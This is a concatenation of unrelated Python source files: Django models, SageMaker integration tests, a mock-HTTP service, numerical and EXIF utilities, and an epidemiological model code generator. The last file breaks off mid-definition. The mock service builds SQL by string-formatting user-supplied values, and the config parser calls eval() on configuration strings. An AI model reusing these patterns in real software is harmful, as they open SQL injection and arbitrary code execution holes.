"""returns a list of warnings concerning this session
"""
warnings_list = [m.warnings() for m in self.meal_set.all()]
warnings = OrderedDict()
for warning in warnings_list:
warnings.update(warning)
return warnings
def admin_warnings(self):
warnings = self.warnings().values()
if len(warnings):
return '\n'.join(['<p class="text-danger"><span class="glyphicon '
'glyphicon-exclamation-sign"></span> {}</p>\n'
.format(s) for s in warnings])
else:
return '<p class="text-success"><span class="glyphicon '\
'glyphicon-ok-sign"></span> Tout va bien ♥</p>'
admin_warnings.short_description = 'Avertissements'
admin_warnings.allow_tags = True
def __str__(self):
return self.name
class Meta:
verbose_name = 'session'
|
from .__about__ import (
__author__,
__commit__,
__copyright__,
__email__,
__license__,
__summary__,
__title__,
__uri__,
__version__,
)
from .koumura import parse_xml, load_song_annot, get_trans_mat
from .koumura import Syllable, Sequence
from .koumura import Resequencer
|
from django.db import models
from enterprise_manage.apps.user_center.models import UserProfile
class ScoreProject(models.Model):
name = models.CharField(verbose_name='名称', max_length=30)
class Meta:
verbose_name = "打分项目"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class ScoreOption(models.Model):
name = models.CharField(verbose_name='名称', max_length=30)
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
score_min = models.IntegerField(verbose_name='最小分值')
score_max = models.IntegerField(verbose_name='最大分值')
class Meta:
verbose_name = "打分选项"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class UserProfileScoreProject(models.Model):
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
to_user_profile = models.ForeignKey(UserProfile, verbose_name='关联用户', on_delete=models.CASCADE)
    exclude_user_profile = models.ManyToManyField(
        UserProfile,
        related_name='exclude_user_profile',
        verbose_name='不评选人员',
        blank=True
    )
class Meta:
verbose_name = "用户参与的打分项目"
verbose_name_plural = verbose_name
def __str__(self):
return '{}-{}'.format(self.to_score_project.name, self.to_user_profile.name)
class ScoreUserProfile(models.Model):
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
to_user_profile = models.ForeignKey(UserProfile, verbose_name='关联人员', on_delete=models.CASCADE)
order_num = models.IntegerField(verbose_name='排序', default=0, blank=True)
class Meta:
verbose_name = "参与打分的人员表"
verbose_name_plural = verbose_name
unique_together = ['to_score_project', 'to_user_profile']
def __str__(self):
return self.to_score_project.name
class ScoreResult(models.Model):
to_score_user_profile = models.ForeignKey(ScoreUserProfile, verbose_name='关联打分人员表', on_delete=models.CASCADE)
to_score_option = models.ForeignKey(ScoreOption, verbose_name='关联打分项', on_delete=models.CASCADE)
create_user = models.ForeignKey(UserProfile, verbose_name='打分人员', on_delete=models.CASCADE)
create_time = models.DateTimeField(auto_now_add=True)
score_result = models.FloatField(verbose_name='分值', blank=True, default=0)
class Meta:
verbose_name = "打分结果"
        verbose_name_plural = verbose_name
unique_together = ['to_score_user_profile', 'to_score_option', 'create_user']
def __str__(self):
return self.to_score_user_profile.to_score_project.name
|
def my_func(p1=1) -> object:
return p1
d = my_func(1)
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import os
from packaging import version
import pytest
from sagemaker.huggingface import HuggingFace
from sagemaker.huggingface import TrainingCompilerConfig as HFTrainingCompilerConfig
from sagemaker.tensorflow import TensorFlow
from sagemaker.tensorflow import TrainingCompilerConfig as TFTrainingCompilerConfig
from tests import integ
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout
@pytest.fixture(scope="module")
def gpu_instance_type(request):
return "ml.p3.2xlarge"
@pytest.fixture(scope="module")
def imagenet_val_set(request, sagemaker_session, tmpdir_factory):
"""
Copies the dataset from the bucket it's hosted in to the local bucket in the test region
"""
local_path = tmpdir_factory.mktemp("trcomp_imagenet_val_set")
sagemaker_session.download_data(
path=local_path,
bucket="collection-of-ml-datasets",
key_prefix="Imagenet/TFRecords/validation",
)
train_input = sagemaker_session.upload_data(
path=local_path,
key_prefix="integ-test-data/trcomp/tensorflow/imagenet/val",
)
return train_input
@pytest.fixture(scope="module")
def huggingface_dummy_dataset(request, sagemaker_session):
"""
Copies the dataset from the local disk to the local bucket in the test region
"""
data_path = os.path.join(DATA_DIR, "huggingface")
train_input = sagemaker_session.upload_data(
path=os.path.join(data_path, "train"),
key_prefix="integ-test-data/trcomp/huggingface/dummy/train",
)
return train_input
@pytest.fixture(scope="module", autouse=True)
def skip_if_incompatible(request):
"""
These tests are for training compiler enabled images/estimators only.
"""
if integ.test_region() not in integ.TRAINING_COMPILER_SUPPORTED_REGIONS:
pytest.skip("SageMaker Training Compiler is not supported in this region")
if integ.test_region() in integ.TRAINING_NO_P3_REGIONS:
pytest.skip("no ml.p3 instances in this region")
@pytest.mark.release
def test_huggingface_pytorch(
sagemaker_session,
gpu_instance_type,
huggingface_training_compiler_latest_version,
huggingface_training_compiler_pytorch_latest_version,
huggingface_dummy_dataset,
):
"""
Test the HuggingFace estimator with PyTorch
"""
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "huggingface")
hf = HuggingFace(
py_version="py38",
entry_point=os.path.join(data_path, "run_glue.py"),
role="SageMakerRole",
transformers_version=huggingface_training_compiler_latest_version,
pytorch_version=huggingface_training_compiler_pytorch_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"model_name_or_path": "distilbert-base-cased",
"task_name": "wnli",
"do_train": True,
"do_eval": True,
"max_seq_length": 128,
"fp16": True,
"per_device_train_batch_size": 128,
"output_dir": "/opt/ml/model",
},
environment={"GPU_NUM_DEVICES": "1"},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=HFTrainingCompilerConfig(),
)
hf.fit(huggingface_dummy_dataset)
@pytest.mark.release
def test_huggingface_tensorflow(
sagemaker_session,
gpu_instance_type,
huggingface_training_compiler_latest_version,
huggingface_training_compiler_tensorflow_latest_version,
huggingface_dummy_dataset,
):
"""
Test the HuggingFace estimator with TensorFlow
"""
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "huggingface")
hf = HuggingFace(
py_version="py38",
entry_point=os.path.join(data_path, "run_tf.py"),
role="SageMakerRole",
transformers_version=huggingface_training_compiler_latest_version,
tensorflow_version=huggingface_training_compiler_tensorflow_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"model_name_or_path": "distilbert-base-cased",
"per_device_train_batch_size": 128,
"per_device_eval_batch_size": 128,
"output_dir": "/opt/ml/model",
"overwrite_output_dir": True,
"save_steps": 5500,
},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=HFTrainingCompilerConfig(),
)
hf.fit(huggingface_dummy_dataset)
@pytest.mark.release
def test_tensorflow(
sagemaker_session,
gpu_instance_type,
tensorflow_training_latest_version,
imagenet_val_set,
):
"""
Test the TensorFlow estimator
"""
if version.parse(tensorflow_training_latest_version) < version.parse("2.9"):
pytest.skip("Training Compiler only supports TF >= 2.9")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
epochs = 10
batch = 256
train_steps = int(10240 * epochs / batch)
steps_per_loop = train_steps // 10
overrides = (
f"runtime.enable_xla=True,"
f"runtime.num_gpus=1,"
f"runtime.distribution_strategy=one_device,"
f"runtime.mixed_precision_dtype=float16,"
f"task.train_data.global_batch_size={batch},"
f"task.train_data.input_path=/opt/ml/input/data/training/validation*,"
f"task.train_data.cache=False,"
f"trainer.train_steps={train_steps},"
f"trainer.steps_per_loop={steps_per_loop},"
f"trainer.summary_interval={steps_per_loop},"
f"trainer.checkpoint_interval={train_steps},"
f"task.model.backbone.type=resnet,"
f"task.model.backbone.resnet.model_id=50"
)
tf = TensorFlow(
py_version="py39",
git_config={
"repo": "https://github.com/tensorflow/models.git",
"branch": "v2.9.2",
},
source_dir=".",
entry_point="official/vision/train.py",
model_dir=False,
role="SageMakerRole",
framework_version=tensorflow_training_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"experiment": "resnet_imagenet",
"config_file": "official/vision/configs/experiments/image_classification/imagenet_resnet50_gpu.yaml",
"mode": "train",
"model_dir": "/opt/ml/model",
"params_override": overrides,
},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=TFTrainingCompilerConfig(),
)
tf.fit(
inputs=imagenet_val_set,
logs=True,
wait=True,
)
|
import apps.common.func.InitDjango
from all_models.models import *
from all_models.models.A0011_version_manage import TbVersionHttpInterface
from django.db import connection
from django.forms.models import model_to_dict
from apps.common.func.CommonFunc import *
from all_models_for_mock.models import *
from apps.common.model.Config import Config
from apps.common.func.send_mail import send_mail
class MockHttpService(object):
@staticmethod
def getInterface():
return TbHttpInterface.objects.all()
@staticmethod
def getInterfaceList(execCheckSql, params):
cursor = connection.cursor()
cursor.execute(execCheckSql, params)
return cursor.fetchall()
# @staticmethod
# def user_contacts():
# audit = 2
# sql = """SElECT * from tb_http_interface i LEFT JOIN tb_user u ON i.addBy = u.loginName WHERE 1=1 and i.state=1 and (i.addBy LIKE %s or u.userName LIKE %s) LIMIT 0,%s """ % ("%s","%s",commonWebConfig.interFacePageNum)
# cursor = connection.cursor()
# cursor.execute(sql, ["l11111111111iyc","liyc"])
# rowData = cursor.fetchall()
#
# col_names = [desc[0] for desc in cursor.description]
# result = []
# for row in rowData:
# objDict = {}
# # Iterate over each row and put its values into a dict keyed by column name
# for index, value in enumerate(row):
# # print(index, col_names[index], value)
# objDict[col_names[index]] = value
#
# result.append(objDict)
#
# return rowData
@staticmethod
def getInterfaceForId(id):
return Tb4MockHttp.objects.filter(id=id)[0]
@staticmethod
def getInterfaceByMockId(mockId):
try:
return Tb4MockHttp.objects.filter(mockId=mockId)[0]
except IndexError:
return False
@staticmethod
def getVersionInterfaceForId(id):
return TbVersionHttpInterface.objects.filter(id=id)[0]
@staticmethod
def getInterfaceForIdToDict(id):
return dbModelToDict(Tb4MockHttp.objects.filter(id=id)[0])
@staticmethod
def getVersionInterfaceForIdToDict(id,versionName):
return dbModelToDict(TbVersionHttpInterface.objects.filter(id=id,versionName_id=versionName)[0])
@staticmethod
def delInterfaceForId(request,id):
interfaceObj = Tb4MockHttp.objects.filter(id=id)
return interfaceObj.update(state=0)
@staticmethod
def delVersionInterfaceForId(request,id):
interfaceObj = TbVersionHttpInterface.objects.filter(id=id)
if request.session.get("loginName") != interfaceObj[0].addBy.loginName:
changeLog = TbUserChangeLog()
changeLog.version = request.session.get("version")
changeLog.loginName = request.session.get("loginName")
changeLog.otherLoginName = interfaceObj[0].addBy.loginName
changeLog.type = 0
changeLog.beforeChangeData = dictToJson(dbModelToDict(interfaceObj[0]))
changeLog.dataId = interfaceObj[0].interfaceId
changeLog.changeDataId = interfaceObj[0].interfaceId
changeLog.save()
return interfaceObj.update(state=0)
@staticmethod
def addHttpMockInfo(data,addBy):
newDataDict = {}
for k, v in data.items():
newDataDict[k] = data[k]
newDataDict["addBy"] = addBy
newDataDict["mockId"] = MockHttpService.getMockId()
saveInterface = Tb4MockHttp.objects.create(**newDataDict)
return saveInterface
@staticmethod
def addVersionInterface(data,addBy,versionName):
newDataDict = {}
for k, v in data.items():
newDataDict[k] = data[k]
newDataDict["addBy_id"] = addBy
newDataDict["interfaceId"] = MockHttpService.getVersionInterfaceId(versionName)
newDataDict["versionName_id"] = versionName
newDataDict["addTime"] = datetime.datetime.now()
newDataDict["modTime"] = datetime.datetime.now()
saveInterface = TbVersionHttpInterface.objects.create(**newDataDict)
return saveInterface
@staticmethod
def queryPeopleInterface(now_pageNum,pageNum , loginName):
limit = ('%d,%d' % (now_pageNum * pageNum,pageNum))
execSql = 'SELECT u.loginName , u.userName, c.count from tb_user u LEFT JOIN (SELECT addBy as loginName,COUNT(*) as count FROM tb_http_interface where state=1 GROUP BY addBy ) c on u.loginName = c.loginName WHERE u.state = 1 and c.count>0 and u.loginName != "%s" order by c.count desc LIMIT %s ;' % (loginName,limit)
resultDict = executeSqlGetDict(execSql,[])
return resultDict
@staticmethod
def getMockId():
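# Generates sequential ids: if the newest row holds mockId 'MOCK_HTTP_12', the next id is
# 'MOCK_HTTP_13'; an empty table (or any lookup failure) falls back to 'MOCK_HTTP_1'.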
try:
interfaceMaxId = Tb4MockHttp.objects.latest('id').mockId
except Exception as e:
interfaceId = 'MOCK_HTTP_1'
return interfaceId
splitData = interfaceMaxId.split('_')
interfaceId = "MOCK_HTTP_%s" % str(int(splitData[-1])+1)
return interfaceId
@staticmethod
def getVersionInterfaceId(versionName):
try:
interfaceMaxId = TbVersionHttpInterface.objects.filter(versionName_id=versionName).latest('id').interfaceId
except Exception as e:
interfaceId = 'HTTP_INTERFACE_1'
return interfaceId
splitData = interfaceMaxId.split('_')
interfaceId = "%s_%s_%s" % (splitData[0],splitData[1],(int(splitData[2])+1))
return interfaceId
@staticmethod
def getInterfaceForInterfaceId(interfaceId):
return TbHttpInterface.objects.filter(interfaceId=interfaceId)[0]
@staticmethod
def getVersionInterfaceForInterfaceId(interfaceId,versionName):
return TbVersionHttpInterface.objects.filter(interfaceId=interfaceId,versionName_id=versionName)[0]
@staticmethod
def interfaceSaveEdit(request,interfaceData):
interfaceObj = Tb4MockHttp.objects.filter(mockId=interfaceData["mockId"])
if interfaceObj:
if interfaceObj[0].addBy == "" or interfaceObj[0].addBy == None:
interfaceData['addBy'] = interfaceData['modBy']
whether_change = False
for tmpk in interfaceData:
dstValue = interfaceData[tmpk]
srcValue = getattr(interfaceObj[0], tmpk)
if str(dstValue) != str(srcValue):
whether_change = True
if whether_change:
interfaceData["modTime"] = datetime.datetime.now()
interfaceData["modBy"] = request.session.get("loginName")
interfaceObj.update(**interfaceData)
# Email the people following this mock interface
follower_email = ""
sql = "select user.email from tb4_mock_follower follower LEFT JOIN tb_user user on follower.follower=user.loginName where follower.mockId='%s'" % interfaceData["mockId"]
res= executeSqlGetDict(sql)
for tmpemail in res:
follower_email += "%s;" % tmpemail["email"]
follower_email = follower_email.strip(";")
if follower_email != "":
subject = "【%s】【%s】已更新,请关注!" % (interfaceData["mockId"], interfaceData["reqUrl"])
emailhtml = render(None, "mock_server/email.html", interfaceData).content.decode("utf8")
send_mail(follower_email, subject, emailhtml, sub_type="html")
return "更新成功"
else:
return "没有变更"
@staticmethod
def interfaceVersionSaveEdit(interfaceData):
interfaceSaveEditResule = TbVersionHttpInterface.objects.filter(id=interfaceData["id"]).update(**interfaceData)
return interfaceSaveEditResule
@staticmethod
def taskCheckInterfaceList(interfaceIdList):
interfaceList = TbHttpInterface.objects.filter(interfaceId__in=interfaceIdList)
return interfaceList
@staticmethod
def getUri(httpConfKey, uriKey,protocol = "HTTP"):
confObj = TbEnvUriConf.objects.filter(httpConfKey = httpConfKey,state = 1,uriKey = uriKey)
if confObj:
reqHost = confObj[0].requestAddr
return reqHost
else:
return ""
@staticmethod
def follow(mockid, operate, follower):
if operate == "follow":
followinfo = Tb4MockFollower.objects.filter(mockId=mockid,follower=follower).all()
if followinfo:
followinfo = followinfo[0]
else:
followinfo = Tb4MockFollower(mockId=mockid, follower=follower)
followinfo.state = 1
followinfo.save()
return 10000, "关注成功!"
elif operate == "cancel":
followinfo = Tb4MockFollower.objects.filter(mockId=mockid,follower=follower).all()
if followinfo:
followinfo = followinfo[0]
else:
return False, "施主,未曾关注,何必取消?"
followinfo.state = 0
followinfo.save(force_update=True)
return 10000, "取消关注成功!"
else:
return 10012, "Invalid operation!"
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 02:23:14 2015
@author: Dimi
"""
import numpy as np
from solve_l1 import solve_l1
def formulate_sparse(A, b):
"""
A must be a M x N array
b must be a M x 1 array
Output:
y is a N x 1 array
"""
m, n = A.shape
if b.ndim != 2 or b.shape[1] != 1:
print("The shape of b must be %d x 1" % m)
elif b.shape[0] != m:
print("The shape of b must be %d x 1" % m)
else: # solve
U, S, V = np.linalg.svd(A) # V is already V.T
invA = np.linalg.pinv(A)
r = sum(S < 10**(-8)) # number of (near-)zero singular values of A
c = np.concatenate([np.zeros(r), np.ones(m - r)])
result = solve_l1(invA, np.dot(V.T, c)) # because the V returned from svd is V.T
return result
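if __name__ == "__main__":
# Illustrative sketch (added, not from the original module): exercise formulate_sparse
# on a small random square system, assuming the local solve_l1 module is importable
# and that solve_l1(matrix, vector) runs as expected.
np.random.seed(0)
A = np.random.randn(8, 8)
b = np.random.randn(8, 1)
y = formulate_sparse(A, b)
print("Recovered y: %s" % repr(y))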
|
# -*- coding: utf-8 -*-
'''
.. created on 08.09.2016
.. by Christoph Schmitt
'''
from __future__ import print_function, absolute_import, division, unicode_literals
from reflexif.compat import *
from reflexif.models.tiff import TiffHeader
from reflexif.framework.model_base import FrameObject, child, value, Structs
from reflexif.framework.declarative import extend
class ExifHeader(FrameObject):
exif_start = value(0, 6, desc='Exif marker')
tiff_header = child(TiffHeader, 6, desc='TIFF header')
class JPEGExifSegment(FrameObject):
exif_segment_raw = child()
exif_segment = child(ExifHeader)
@property
def tiff_header(self):
return self.exif_segment.tiff_header
@extend(TiffHeader)
class ExifExtension(FrameObject):
exif_ifd = child()
gps_ifd = child()
interop_ifd = child()
def search_tag(self, ifdname, tag):
ifd = None
if ifdname == "Image":
if self.ifds:
ifd = self.ifds[0]
elif ifdname == "Exif":
ifd = self.exif_ifd
if not ifd:
return
return ifd.search_tag(tag)
@extend(TiffHeader, depends_on=[ExifExtension])
class MakernoteExentsion(FrameObject):
makernote = child()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 1 13:08:57 2020
"""
from dataclasses import dataclass
import collections
import dacite
import textwrap
import re
from .generic import codeconfig_getvars, prettifyvarname
from . import buildingblocks_dir, indentStr
import warnings
import typing
class EFractions (collections.OrderedDict):
"""
Handles the Exit fractions.
See :class:`victoria.AuxMatrix`
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.foundlist = False
print ("Define: self.foundlist = "+str())
for k in self.keys():
frac = eval(str(self[k]))
if isinstance(frac,float):
assert frac<=1
assert frac>=0
elif isinstance(frac,typing.List):
self.foundlist = True
assert [x<=1 for x in frac] == [True] * len(frac), str(frac) + "<=1 not True"
assert [x>=0 for x in frac] == [True] * len(frac), str(frac) + ">=0 not True"
else:
# Expecting a list; arbitrary code in place of a fraction is not supported for now.
assert isinstance(frac, typing.List), k + ": " + str(frac) + "not valid"
if self.foundlist:
lens = [len(self[k]) for k in self.keys()]
assert lens == [lens[0]] * len(lens), "Exit fractions have different lengths: \n" + str({key:len(value) for (key,value) in self.items()})
self.ngrp = lens[0]
# TODO: post init asserts
def __repr__(self):
# FIX: unused?
res="{----------------------------"
for k in self.keys():
res+=" '"+str(k)+"':"+str(self[k])+","
res=res[:-1]+" }"
return(res)
def inlineargs(self):
""" Inline argument definition.
Outputs a string like this "f=5.0/100.0, g=0.03, h=0.4, i=0.5, "
to be used for function definition
"""
proportions_def=""
for k in self.keys():
proportions_def+=k+"="+str(self[k])+", "
#proportions_def=proportions_def[:-2]
return proportions_def
def inlineargsequals(self):
""" Inline argument definition.'
Outputs a string like this "f=f, g=g, h=h, i=i, "
to be used for Model_$className function calling
if groups are present the output is like
if ngroup
f=self.f[grp], g=self.g[grp], h=self.h[grp], i=self.i[grp]
"""
if self.foundlist:
proportions_def=""
for k in self.keys():
proportions_def+=k+"=self."+k+"[grp], "
#proportions_def=proportions_def[:-2]
return proportions_def
# in case exit probabilities are plain fractions
proportions_def=""
for k in self.keys():
proportions_def+=k+"="+k+", "
#proportions_def=proportions_def[:-2]
return proportions_def
def exitprobsDefinitions(self, baseIndent):
""" Write exit probabilities definitions for Init_fm_matrix method.
Outputs a string like::
f, g = exit_probs
self.f = f
self.g = g
"""
res = ", ".join(self.keys()) + " = exit_probs\n"
for k in self.keys():
res += "self."+k+" = "+k+"\n"
res = textwrap.indent(res, baseIndent)
res = res.replace(baseIndent,"", 1)
return res
def ModelCall_exit_probs (self):
res="["
for k in self.keys():
res+=str(self[k])+", "
res=res[:-2]+"]"
return(res)
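# Illustrative note (added): EFractions({'f': '0.05', 'g': '0.03'}) validates that every fraction
# lies in [0, 1]; inlineargs() then yields "f=0.05, g=0.03, ", and when per-group lists are given
# inlineargsequals() switches to the "f=self.f[grp], " form.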
@dataclass
class ModelMatrix:
className: str
""" See :any:`victoriaepi.configparsing.config.ModelConfig.className`"""
complexity: str
""" See :any:`victoriaepi.configparsing.config.ModelConfig.complexity`"""
prnDefault: str
""" prn -- to print or not the matrix after each operation, change default behavior."""
names: str
""" Names used in :any:`victoriaepi.victoria.AuxMatrix` """
BaseVar: str
"""Define Base Variable. see :meth:`victoriaepi.victoria.AuxMatrix.BaseVar` """
Exits: collections.OrderedDict
"""Dictionary defining connections between variables. The key represents the source variable and the value is a dict.
Example::
Exits:{
#AuxMatrix.Exit( 'S', 'E')
"S" : {"E":{}}
#AuxMatrix.SplitExit( 'E', 'I^A', 'I^S', 1-f, prob_symb=['1-f','f'])
"E" : {
"I^A":{
"prob":1-f
"prob_symb":'1-f'
}
"I^S":{
"prob":f
"prob_symb":'f'}
}
#AuxMatrix.NoExit('R')
"R" : {}
#AuxMatrix.NoExit('D')
"D" : {}
}
see also :any:`victoriaepi.victoria.AuxMatrix`
"""
ExitFractions: collections.OrderedDict = None
"""Defines the exit fractions.
Example::
ExitFractions:{
#Each can be an expression or a List of expressions
# fraction of severe infections
f:[0.05, 0.05, 0.05, 0.05]
# fraction of severe infections that require hospitalization
g:[0.004 , 0.0348 , 0.12333333, 0.2396 ]
# fraction of hospitations that require ICU
h:[0.05 , 0.0552 , 0.17266667, 0.5112 ]
# fraction of ICU patients who die
i:[0.5, 0.5, 0.5, 0.5]
}
see also :any:`victoriaepi.victoria.AuxMatrix`
This is later cast as :class:`victoriaepi.configparsing.modelclass.EFractions`
"""
def __post_init__(self):
self.splitnames = self.names.split()
# consistency checks
assert self.BaseVar in self.splitnames, "BaseVar not in names"
for k in set([kk for k in self.Exits for kk in [k]+list(self.Exits[k])]):
assert k in self.splitnames, k + " used in connections but not in names"
self.connections = self.create_connections()
# Additional configuration based on complexity
if self.ExitFractions is not None:
if len(self.ExitFractions.keys()) == 0:
self.ExitFractions = None
if self.ExitFractions is not None:
self.ExitFractions = EFractions(self.ExitFractions)
self.inlineProbArgs = self.ExitFractions.inlineargs()
def processcon(self, origin, dest):
"""
Process individual connections.
Creates connection code such as ``T.Exit( 'I^B', 'R')``
"""
if(len(dest.keys())) == 0:
return('T.NoExit("'+origin+'")\n')
if(len(dest.keys())) == 1:
return('T.Exit( "'+origin+'" , "'+list(dest.keys())[0]+'" )\n')
if(len(dest.keys())) == 2:
v1 = list(dest.keys())[0]
v2 = list(dest.keys())[1]
# TODO: assert probabilities?
# assert dest[v1]["prob"]+dest[v2]["prob"]==1, "Proportion "+origin+"->"+v1+"+"+v2+"="+dest[v1]["prob"]+dest[v2]["prob"]+"!=1"
prob = dest[v1]["prob"]
prob_symb=[dest[v1]["prob_symb"], dest[v2]["prob_symb"]]
return('T.SplitExit( "'+origin+'" , "'+v1+'" , "'+v2+'" , '+prob
+' , '+str(prob_symb)+' )\n')
raise RuntimeError('Unable to handle more than two exit connections')
def create_connections(self):
""" Create connection code for all connections.
Example output::
T.BaseVar('S')
T.Exit( 'S', 'E')
T.SplitExit( 'E', 'I^A', 'I^S', 1-f, prob_symb=['1-f','f'])
T.Exit( 'I^A', 'R')
"""
code='T.BaseVar("'+self.BaseVar+'")\n'
for origin in self.Exits:
code+=self.processcon(origin, self.Exits[origin])
code=textwrap.indent(code, indentStr)
return code
def gencode(self, indent=""):
"""Generate code for a function such as :meth:`victoriaepi.ama.Model_ama` or :meth:`victoriaepi.seid.Model_SEID` depending on complexity."""
with open(buildingblocks_dir+self.complexity+"_ModelMatrix.py","r") as f:
fullcode= f.read()
variables=codeconfig_getvars(fullcode)
if len(variables)>0:
variables.sort(key=lambda x: len(x), reverse=True)
for va in variables:
if eval("self."+va[1:]) is None:
warnings.warn("Inserting None for "+va, UserWarning)
fullcode=fullcode.replace(va, str(eval("self."+va[1:])))
compile(fullcode, "<ModelMatrix Code>\n"+fullcode, 'exec')
firstline=fullcode.splitlines()[0]
return textwrap.indent(fullcode,
indent,
lambda x: not firstline in x)
def genMaskcode(self, indent=""):
"""Generate code for the masks to select variables from list of state variables, for all variables.
Example::
self.mask_S = self.T.SelectMask('S')
self.mask_E = self.T.SelectMask('E')
self.mask_IA = self.T.SelectMask('I^A')
self.mask_ISs = self.T.SelectMask('I^S', E_range='all', as_col_vec=True)
self.mask_IBs = self.T.SelectMask('I^B', E_range='all', as_col_vec=True)
self.mask_ISs_flat = self.T.SelectMask('I^S', E_range='all')
"""
code=''
for var in self.splitnames:
code+="self.mask_"+prettifyvarname(var)+" = self.T.SelectMask('"+var+"')\n"
code+="self.mask_"+prettifyvarname(var)+"s_flat = self.T.SelectMask('"+var+"', E_range='all')\n"
#Adding 's and _flat for splits
if len(self.Exits[var].keys())==2:
code+="self.mask_"+prettifyvarname(var)+"s = self.T.SelectMask('"+var+"', E_range='all', as_col_vec=True)\n"
compile(code, "<ModelMatrix Mask Code>", 'exec')
firstline=code.splitlines()[0]
return textwrap.indent(code,
indent,
lambda x: not firstline in x)
def genSelfExitProbscode(self, indent=""):
return("")#TODO: genSelfExitProbscode
def __repr__(self):
"""Return this object as raw code representation for a function such as :meth:`victoriaepi.ama.Model_ama` or :meth:`victoriaepi.seid.Model_SEID` depending on complexity."""
return self.gencode()
class rawfuncbody():
"""
Process a raw string as a function body and tests it for valid Python code with ``compile()``.
"""
def __init__(self, strfun, indent=indentStr):
self.strfun=strfun
self.indent=indent
strfun0=re.sub(r"(\s*)(return( |$|\n))", r"\1Return0=0#\3", strfun)
#strfun0=strfun.replace("return ","Return0 = ")
#strfun0=strfun.replace("return\n","#return\n")
compile(strfun0, "<\n"+strfun0+"\n>", 'exec')
def __repr__(self):
return textwrap.indent(self.strfun,
self.indent)
@dataclass
class functiondef ():
"""Defining functions from ordered dicts."""
defn: str
body: str
def __post_init__(self):
assert re.search( "[:;]", self.defn) is None
assert re.search( "^def ", self.defn) is None
compile(self.defn, self.defn,"exec")
self.defn ="def "+self.defn +":"
self.body = rawfuncbody(self.body, indent = indentStr)
self.baseIndent = ""
compile(self.__repr__(), "<"+self.__repr__()+">", 'exec')
def __repr__(self):
return textwrap.indent(self.defn+"\n"+str(self.body),
self.baseIndent)
@classmethod
def fromodic(cls, odic, baseIndent=""):
"""
Initialize instance from dictionary
Parameters
"""
assert re.search( r"[^\s]", baseIndent) is None
cins = dacite.from_dict(data_class = cls, data = odic)
cins.baseIndent = baseIndent
return cins
class functionCollection ():
"""Handles a dictionary consisting of several :any:`victoriaepi.configparsing.modelclass.functiondef`.
"""
def __init__(self, methodict, baseIndent):
assert re.search( r"[^\s]", baseIndent) is None
self.baseIndent = baseIndent
self.methodict = methodict.copy()
for k in self.methodict.keys():
self.methodict[k] = functiondef.fromodic(self.methodict[k], self.baseIndent)
def __repr__(self):
"""Generates Python code for the function"""
res=""
for k in self.methodict.keys():
res+=str(self.methodict[k])+"\n\n"
#remove indentation from the first line, as it is expected to be provided externally
res = res.replace(self.baseIndent,"", 1)
return (res)
class solvingMethods (functionCollection):
""" Making sure basic solving functions are present. This class is an extension of
:any:`victoriaepi.configparsing.modelclass.functionCollection` that ensures that
``rhs``, ``solve``, ``llikelihood``, ``lprior``, ``support``, and ``sim_init`` are properly defined.
"""
def __init__(self, methodict, baseIndent):
super().__init__(methodict, baseIndent)
funcs = self.methodict.keys()
basicfuncs=['rhs', 'solve', 'llikelihood', 'lprior', 'support', 'sim_init']
for bf in basicfuncs:
assert bf in funcs, bf +" method expected in solvingMethods"
r = re.compile("solve_plain.*")
assert len(list(filter(r.match, self.methodict.keys() )))>0,"At least one 'solve_plain' method expected in solvingMethods"
class plottingMethods (functionCollection):
"""Making sure basic plotting functions are present. This class is an extension of
:any:`victoriaepi.configparsing.modelclass.functionCollection` that ensures that at least one ``PlotEvolution.*`` method is present."""
def __init__(self, methodict, baseIndent):
super().__init__(methodict, baseIndent)
r = re.compile("PlotEvolution.*")
assert len(list(filter(r.match, self.methodict.keys() )))>0,"At least one 'PlotEvolution' method is expected in plottingMethods"
|
# -*- coding: utf-8 -*-
"""Common exception types for database operations"""
from __future__ import absolute_import, division, unicode_literals
class SQLiteConnectionError(Exception):
"""An error occurred in the database connection"""
class SQLiteError(Exception):
"""An error occurred in the database operations"""
class MySQLConnectionError(Exception):
"""An error occurred in the database connection"""
class MySQLError(Exception):
"""An error occurred in the database operations"""
class ProfilesMissing(Exception):
"""There are no stored profiles in database"""
|
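# Overview (added note, derived from the code below): this module is a minimal cursor-based
# reader for an interpreted script. next_file()/prev_file() swap in a single imported source
# buffer (nested imports are rejected), next_instruction() advances to the next whitespace-
# delimited instruction token, and get_next_param() reads one parameter, honoring double
# quotes and backslash escapes; '#' outside quotes ends a parameter (comment).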
code = ""
file = ""
pos = 0
line = 0
oldLine = 0
oldPos = 0
oldCode = ""
oldFile = ""
def next_file(name, src):
global code, file, pos, line, oldLine, oldPos, oldCode, oldFile
if (oldFile != ""):
return "imports aren't allowed in imported files!"
oldCode = code
oldFile = file
oldLine = line
oldPos = pos
code = src
file = name
pos = 0
line = 0
return ""
def prev_file():
